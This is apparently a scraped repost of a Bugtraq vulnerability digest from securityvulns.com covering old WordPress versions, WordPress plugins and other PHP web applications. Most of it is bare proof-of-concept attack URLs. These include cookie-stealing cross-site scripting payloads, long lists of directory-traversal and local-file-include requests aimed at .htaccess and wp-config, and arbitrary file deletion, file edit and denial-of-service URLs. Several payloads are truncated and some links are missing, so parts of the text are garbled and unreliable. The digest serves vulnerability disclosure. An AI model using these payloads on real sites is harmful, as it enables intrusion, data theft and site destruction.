天天看點
傳回

securityvulns.com russian vulnerabilities digest wordpress 漏洞

Dear bugtraq,

  Below    is    a    digest    of    vulnerabilities    published    by

  English.    All    vulnerabilities    were    reported   by   MustLive

  1. AwesomeTemplateEngine Crossite scripting

  Multiple crossite scripting (require register_globvals):

ocument.cookie)%3C/script%3E /

script%3Ealert(document.cookie)%3C/script%3E /

(document.cookie)%3C/script%3E /

cookie)%3C/script%3E

  2. Wordpress multiple security vulnerabilities:

   2.1 information disclosure (WordPress 2.2/2.3)

    Invalid request disclosures database structure and local paths:

   2.2 crossite scripting (WordPress <= 2.0.9)

(alert(document.cookie))%22

   2.3  Directory  traversal, Arbitrary file deletion, Denial of Service

   and Cross-Site Scripting via wp-db-backup.php

   Directory Traversal (WordPress <= 2.0.3):

<a href="http://site/wp-admin/edit.php?page=wp-db-backup.php&amp;backup=../../.htaccess">http://site/wp-admin/edit.php?page=wp-db-backup.php&amp;backup=../../.htaccess</a>

<a href="http://site/wp-admin/edit.php?page=wp-db-backup.php&amp;backup=/../../.htaccess">http://site/wp-admin/edit.php?page=wp-db-backup.php&amp;backup=/../../.htaccess</a>

   Arbitrary file deletion and DoS (WordPress &lt;= 2.0.3):

<a href="http://site/wp-admin/edit.php?page=wp-db-backup.php&amp;backup=../../index.php">http://site/wp-admin/edit.php?page=wp-db-backup.php&amp;backup=../../index.php</a>

<a href="http://site/wp-admin/edit.php?page=wp-db-backup.php&amp;backup=/../../index.php">http://site/wp-admin/edit.php?page=wp-db-backup.php&amp;backup=/../../index.php</a>

   XSS (WordPress &lt;= 2.0.11 and potentially 2.1.x, 2.2.x, 2.3.x):

  2.4  Local  file include, Directory traversal and Full path disclosure

  (WordPress  &lt;=  2.0.11  and potentially 2.1.x, 2.2.x, 2.3.x)

  Full path disclosure:

<a href="http://site/wp-admin/admin.php?import=/../../wp-config">http://site/wp-admin/admin.php?import=/../../wp-config</a>

<a href="http://site/wp-admin/themes.php?page=">http://site/wp-admin/themes.php?page=</a>

<a href="http://site/wp-admin/edit.php?page=">http://site/wp-admin/edit.php?page=</a>

<a href="http://site/wp-admin/admin.php?page=">http://site/wp-admin/admin.php?page=</a>

<a href="http://site/wp-admin/templates.php?file=">http://site/wp-admin/templates.php?file=</a>

<a href="http://site/wp-admin/templates.php?page=">http://site/wp-admin/templates.php?page=</a>

<a href="http://site/wp-admin/edit-pages.php?page=">http://site/wp-admin/edit-pages.php?page=</a>

<a href="http://site/wp-admin/categories.php?page=">http://site/wp-admin/categories.php?page=</a>

<a href="http://site/wp-admin/edit-comments.php?page=">http://site/wp-admin/edit-comments.php?page=</a>

<a href="http://site/wp-admin/moderation.php?page=">http://site/wp-admin/moderation.php?page=</a>

<a href="http://site/wp-admin/post.php?page=">http://site/wp-admin/post.php?page=</a>

<a href="http://site/wp-admin/page-new.php?page=">http://site/wp-admin/page-new.php?page=</a>

<a href="http://site/wp-admin/index.php?page=">http://site/wp-admin/index.php?page=</a>

<a href="http://site/wp-admin/link-manager.php?page=">http://site/wp-admin/link-manager.php?page=</a>

<a href="http://site/wp-admin/link-add.php?page=">http://site/wp-admin/link-add.php?page=</a>

<a href="http://site/wp-admin/link-categories.php?page=">http://site/wp-admin/link-categories.php?page=</a>

<a href="http://site/wp-admin/link-import.php?page=">http://site/wp-admin/link-import.php?page=</a>

<a href="http://site/wp-admin/theme-editor.php?page=">http://site/wp-admin/theme-editor.php?page=</a>

<a href="http://site/wp-admin/plugins.php?page=">http://site/wp-admin/plugins.php?page=</a>

<a href="http://site/wp-admin/plugin-editor.php?page=">http://site/wp-admin/plugin-editor.php?page=</a>

<a href="http://site/wp-admin/profile.php?page=">http://site/wp-admin/profile.php?page=</a>

<a href="http://site/wp-admin/users.php?page=">http://site/wp-admin/users.php?page=</a>

<a href="http://site/wp-admin/options-general.php?page=">http://site/wp-admin/options-general.php?page=</a>

<a href="http://site/wp-admin/options-writing.php?page=">http://site/wp-admin/options-writing.php?page=</a>

<a href="http://site/wp-admin/options-reading.php?page=">http://site/wp-admin/options-reading.php?page=</a>

<a href="http://site/wp-admin/options-discussion.php?page=">http://site/wp-admin/options-discussion.php?page=</a>

<a href="http://site/wp-admin/options-permalink.php?page=">http://site/wp-admin/options-permalink.php?page=</a>

<a href="http://site/wp-admin/options-misc.php?page=">http://site/wp-admin/options-misc.php?page=</a>

<a href="http://site/wp-admin/import.php?page=">http://site/wp-admin/import.php?page=</a>

<a href="http://site/wp-admin/admin-footer.php">http://site/wp-admin/admin-footer.php</a>

<a href="http://site/wp-admin/admin-functions.php">http://site/wp-admin/admin-functions.php</a>

<a href="http://site/wp-admin/edit-form.php">http://site/wp-admin/edit-form.php</a>

<a href="http://site/wp-admin/edit-form-advanced.php">http://site/wp-admin/edit-form-advanced.php</a>

<a href="http://site/wp-admin/edit-form-comment.php">http://site/wp-admin/edit-form-comment.php</a>

<a href="http://site/wp-admin/edit-link-form.php">http://site/wp-admin/edit-link-form.php</a>

<a href="http://site/wp-admin/edit-page-form.php">http://site/wp-admin/edit-page-form.php</a>

<a href="http://site/wp-admin/menu.php">http://site/wp-admin/menu.php</a>

<a href="http://site/wp-admin/menu-header.php">http://site/wp-admin/menu-header.php</a>

<a href="http://site/wp-admin/import/blogger.php">http://site/wp-admin/import/blogger.php</a>

<a href="http://site/wp-admin/import/dotclear.php">http://site/wp-admin/import/dotclear.php</a>

<a href="http://site/wp-admin/import/greymatter.php">http://site/wp-admin/import/greymatter.php</a>

<a href="http://site/wp-admin/import/livejournal.php">http://site/wp-admin/import/livejournal.php</a>

<a href="http://site/wp-admin/import/mt.php">http://site/wp-admin/import/mt.php</a>

<a href="http://site/wp-admin/import/rss.php">http://site/wp-admin/import/rss.php</a>

<a href="http://site/wp-admin/import/textpattern.php">http://site/wp-admin/import/textpattern.php</a>

<a href="http://site/wp-admin/bookmarklet.php?page=">http://site/wp-admin/bookmarklet.php?page=</a>

<a href="http://site/wp-admin/cat-js.php?page=">http://site/wp-admin/cat-js.php?page=</a>

<a href="http://site/wp-admin/inline-uploading.php?page=">http://site/wp-admin/inline-uploading.php?page=</a>

<a href="http://site/wp-admin/options.php?page=">http://site/wp-admin/options.php?page=</a>

<a href="http://site/wp-admin/profile-update.php?page=">http://site/wp-admin/profile-update.php?page=</a>

<a href="http://site/wp-admin/sidebar.php?page=">http://site/wp-admin/sidebar.php?page=</a>

<a href="http://site/wp-admin/user-edit.php?page=">http://site/wp-admin/user-edit.php?page=</a>

  Local file include and Directory traversal:

<a href="http://site/wp-admin/admin.php?import=/../../file">http://site/wp-admin/admin.php?import=/../../file</a>

<a href="http://site/wp-admin/themes.php?page=/../../file.php">http://site/wp-admin/themes.php?page=/../../file.php</a>

<a href="http://site/wp-admin/themes.php?page=/../../.htaccess">http://site/wp-admin/themes.php?page=/../../.htaccess</a>

<a href="http://site/wp-admin/edit.php?page=/../../file.php">http://site/wp-admin/edit.php?page=/../../file.php</a>

<a href="http://site/wp-admin/edit.php?page=/../../.htaccess">http://site/wp-admin/edit.php?page=/../../.htaccess</a>

<a href="http://site/wp-admin/admin.php?page=/../../file.php">http://site/wp-admin/admin.php?page=/../../file.php</a>

<a href="http://site/wp-admin/admin.php?page=/../../.htaccess">http://site/wp-admin/admin.php?page=/../../.htaccess</a>

<a href="http://site/wp-admin/templates.php?page=/../../file.php">http://site/wp-admin/templates.php?page=/../../file.php</a>

<a href="http://sites/wp-admin/templates.php?page=/../../.htaccess">http://sites/wp-admin/templates.php?page=/../../.htaccess</a>

<a href="http://site/wp-admin/edit-pages.php?page=/../../.htaccess">http://site/wp-admin/edit-pages.php?page=/../../.htaccess</a>

<a href="http://site/wp-admin/categories.php?page=/../../.htaccess">http://site/wp-admin/categories.php?page=/../../.htaccess</a>

<a href="http://site/wp-admin/edit-comments.php?page=/../../.htaccess">http://site/wp-admin/edit-comments.php?page=/../../.htaccess</a>

<a href="http://site/wp-admin/moderation.php?page=/../../.htaccess">http://site/wp-admin/moderation.php?page=/../../.htaccess</a>

<a href="http://site/wp-admin/post.php?page=/../../.htaccess">http://site/wp-admin/post.php?page=/../../.htaccess</a>

<a href="http://site/wp-admin/page-new.php?page=/../../.htaccess">http://site/wp-admin/page-new.php?page=/../../.htaccess</a>

<a href="http://site/wp-admin/index.php?page=/../../file.php">http://site/wp-admin/index.php?page=/../../file.php</a>

<a href="http://site/wp-admin/index.php?page=/../../.htaccess">http://site/wp-admin/index.php?page=/../../.htaccess</a>

<a href="http://site/wp-admin/link-manager.php?page=/../../.htaccess">http://site/wp-admin/link-manager.php?page=/../../.htaccess</a>

<a href="http://site/wp-admin/link-add.php?page=/../../.htaccess">http://site/wp-admin/link-add.php?page=/../../.htaccess</a>

<a href="http://site/wp-admin/link-categories.php?page=/../../.htaccess">http://site/wp-admin/link-categories.php?page=/../../.htaccess</a>

<a href="http://site/wp-admin/link-import.php?page=/../../.htaccess">http://site/wp-admin/link-import.php?page=/../../.htaccess</a>

<a href="http://site/wp-admin/theme-editor.php?page=/../../.htaccess">http://site/wp-admin/theme-editor.php?page=/../../.htaccess</a>

<a href="http://site/wp-admin/plugin-editor.php?page=/../../.htaccess">http://site/wp-admin/plugin-editor.php?page=/../../.htaccess</a>

<a href="http://site/wp-admin/profile.php?page=/../../.htaccess">http://site/wp-admin/profile.php?page=/../../.htaccess</a>

<a href="http://site/wp-admin/users.php?page=/../../.htaccess">http://site/wp-admin/users.php?page=/../../.htaccess</a>

<a href="http://site/wp-admin/options-general.php?page=/../../.htaccess">http://site/wp-admin/options-general.php?page=/../../.htaccess</a>

<a href="http://site/wp-admin/options-writing.php?page=/../../.htaccess">http://site/wp-admin/options-writing.php?page=/../../.htaccess</a>

<a href="http://site/wp-admin/options-reading.php?page=/../../.htaccess">http://site/wp-admin/options-reading.php?page=/../../.htaccess</a>

<a href="http://site/wp-admin/options-discussion.php?page=/../../.htaccess">http://site/wp-admin/options-discussion.php?page=/../../.htaccess</a>

<a href="http://site/wp-admin/options-permalink.php?page=/../../.htaccess">http://site/wp-admin/options-permalink.php?page=/../../.htaccess</a>

<a href="http://site/wp-admin/options-misc.php?page=/../../.htaccess">http://site/wp-admin/options-misc.php?page=/../../.htaccess</a>

<a href="http://site/wp-admin/import.php?page=/../../.htaccess">http://site/wp-admin/import.php?page=/../../.htaccess</a>

<a href="http://site/wp-admin/bookmarklet.php?page=/../../.htaccess">http://site/wp-admin/bookmarklet.php?page=/../../.htaccess</a>

<a href="http://site/wp-admin/cat-js.php?page=/../../.htaccess">http://site/wp-admin/cat-js.php?page=/../../.htaccess</a>

<a href="http://site/wp-admin/inline-uploading.php?page=/../../.htaccess">http://site/wp-admin/inline-uploading.php?page=/../../.htaccess</a>

<a href="http://site/wp-admin/options.php?page=/../../.htaccess">http://site/wp-admin/options.php?page=/../../.htaccess</a>

<a href="http://site/wp-admin/profile-update.php?page=/../../.htaccess">http://site/wp-admin/profile-update.php?page=/../../.htaccess</a>

<a href="http://site/wp-admin/sidebar.php?page=/../../.htaccess">http://site/wp-admin/sidebar.php?page=/../../.htaccess</a>

<a href="http://site/wp-admin/user-edit.php?page=/../../.htaccess">http://site/wp-admin/user-edit.php?page=/../../.htaccess</a>

  Arbitrary file edit:

<a href="http://site/wp-admin/templates.php?file=/../../file">http://site/wp-admin/templates.php?file=/../../file</a>

  Attacks with backslash are possible in Windows version.

  Original article (in Russian):

  Additional detail (in Ukrainian):

3. Crossite scripting and Denial of Service in PRO-Search &lt;= 0.17

XSS:

Denial of Service:

<a href="http://site/?show_page=20000&amp;time=0">http://site/?show_page=20000&amp;time=0</a>

4.  Persistant  crossite scripting and request forgery in WP-ContactForm

&lt;= 1.5 alpha (WordPress plugin)

POST request to

<a href="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php">http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php</a>

with different form fields.

Exploits:

Original article (in Russian):

Additional details (in Ukrainian):

5. RotaBanner Local &lt;= 3 crossite scripting

6. ExpressionEngine &lt;= 1.2.1 response splitting and crossite scripting

%3C/script%3E

-=-=-=-

There  are  also  few vulnerabilities published in English as a part of

the Month of Bugs in CAPTCHA:

Cryptographp  &lt;=  1.2  WordPress plugin multiple persistant crossite

scriptings

XSS in Math Comment Spam Protection &lt; 2.2

XSS in Captcha! &lt;= 2.5d

--

<a href="http://securityvulns.com/">http://securityvulns.com/</a>

         //_//

        { , . }     |/

+--oQQo-&gt;{ ^ }&lt;-----+ /

&gt; ZARAZA  U  3APA3A   } You know my name - look up my number (The Beatles)

+-------------o66o--+ /

                    |/

Web App開發 安全 php 索引 web開發架構 web索引 wsgi web函數計算 ftp web連結 web開發input
上一篇: 擷取cuteftp中的ssh密碼
下一篇: 将VMware與SoftICE基于網絡的遠端調試功能相結合

繼續閱讀